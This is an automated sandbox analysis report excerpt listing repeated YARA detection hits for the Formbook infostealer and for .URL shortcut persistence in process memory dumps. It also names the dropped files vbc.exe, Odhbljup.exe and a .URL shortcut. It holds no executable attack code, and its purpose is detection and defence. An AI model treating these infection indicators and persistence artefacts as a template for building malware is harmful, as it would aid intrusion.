              Source: 00000006.00000000.535838106.0000000009304000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000006.00000000.535838106.0000000009304000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000004.00000003.497233291.00000000045D4000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000007.00000003.560576590.00000000046D4000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000004.00000003.497427116.0000000003A2C000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 0000000A.00000003.583748218.00000000045A4000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000007.00000003.560966486.00000000039EC000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000004.00000002.563280324.0000000003A70000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000004.00000002.563280324.0000000003A70000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 0000000A.00000003.584057831.00000000038CC000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000007.00000003.561221425.00000000046D4000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000007.00000003.562432544.00000000039EC000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 0000000A.00000003.584430165.00000000045A4000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000004.00000003.497196939.00000000045D4000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000004.00000003.497027305.00000000045D4000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 0000000C.00000002.676416524.0000000000080000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 0000000C.00000002.676416524.0000000000080000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 0000000A.00000003.583809882.00000000038CC000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000007.00000003.561955738.00000000039EC000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 0000000A.00000003.583259344.00000000045A4000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 0000000A.00000003.583847406.00000000045A4000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000004.00000003.496929665.0000000003A2C000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 0000000C.00000002.676695619.00000000001B0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 0000000C.00000002.676695619.00000000001B0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 0000000A.00000003.583317580.00000000038CC000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 0000000C.00000002.676983429.00000000001F0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 0000000C.00000002.676983429.00000000001F0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 0000000A.00000003.583980388.00000000038CC000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000004.00000002.566151978.00000000047EC000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000004.00000002.566151978.00000000047EC000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000004.00000003.497250611.0000000003A2C000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 0000000A.00000003.583904644.00000000038CC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000007.00000003.560450286.00000000039EC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000004.00000003.497289431.0000000003A2C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000007.00000003.560538390.00000000039EC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000007.00000003.562142811.00000000046D4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000004.00000003.497089082.0000000003A2C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000007.00000003.562245816.00000000039EC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 0000000A.00000003.583483116.00000000038CC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000004.00000003.497109502.00000000045D4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 0000000A.00000003.584129270.00000000038CC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 0000000A.00000003.583705715.00000000038CC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 0000000A.00000003.584336021.00000000038CC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000007.00000003.560383083.00000000046D4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000007.00000003.561149693.00000000039EC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000007.00000003.561547476.00000000039EC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000004.00000003.497453789.00000000045D4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000004.00000002.561814301.0000000002111000.00000020.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000004.00000002.561814301.0000000002111000.00000020.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 0000000A.00000003.583441882.00000000045A4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 0000000A.00000003.584088819.00000000045A4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000004.00000003.497486545.0000000003A2C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000004.00000002.563603839.0000000003CC0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000004.00000002.563603839.0000000003CC0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 0000000A.00000003.584234578.00000000038CC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 0000000A.00000003.584506071.00000000038CC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000007.00000003.560320590.00000000039EC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000004.00000003.497066247.00000000045D4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000004.00000003.497151468.00000000045D4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000004.00000003.497352648.00000000045D4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000004.00000003.497402362.00000000045D4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000004.00000003.497007493.0000000003A2C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000004.00000003.497047805.0000000003A2C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000004.00000002.566701334.00000000049C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000004.00000002.566701334.00000000049C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000004.00000003.497310666.00000000045D4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000004.00000003.497216692.0000000003A2C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000007.00000003.561741705.00000000039EC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 0000000A.00000003.583353394.00000000045A4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000004.00000003.496970511.0000000003A2C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000004.00000003.497375359.0000000003A2C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000007.00000003.561654798.00000000046D4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000007.00000003.560760985.00000000039EC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 0000000A.00000003.583951721.00000000045A4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000007.00000003.560713668.00000000046D4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000004.00000003.497129768.0000000003A2C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000004.00000003.497173543.0000000003A2C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000007.00000003.560263078.00000000046D4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000004.00000003.496988721.00000000045D4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 0000000A.00000003.584197318.00000000045A4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000006.00000000.548231693.0000000009304000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000006.00000000.548231693.0000000009304000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 0000000A.00000003.583532798.00000000045A4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 0000000A.00000003.584010373.00000000045A4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000007.00000003.560188388.00000000039EC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000004.00000003.496950369.00000000045D4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 0000000A.00000003.583656067.00000000045A4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 0000000A.00000003.583176269.00000000038CC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000004.00000003.497333632.0000000003A2C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000007.00000003.561086888.00000000046D4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000007.00000003.561847558.00000000046D4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 0000000A.00000003.583592654.00000000038CC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000007.00000003.561433212.00000000046D4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000007.00000003.560491541.00000000046D4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: Process Memory Space: Odhbljup.exe PID: 2192, type: MEMORYSTRMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: C:\Users\user\pujlbhdO.url, type: DROPPEDMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: C:\Users\Public\vbc.exe, Code function: String function: 004042E4 appears 81 times
              Source: C:\Users\Public\vbc.exe, Code function: String function: 004067E4 appears 61 times
              Source: C:\Users\user\Odhbljup.exe, Code function: String function: 004038F8 appears 44 times
              Source: C:\Users\user\Odhbljup.exe, Code function: String function: 004049F0 appears 38 times
              Source: C:\Users\user\Odhbljup.exe, Code function: String function: 004042E4 appears 162 times
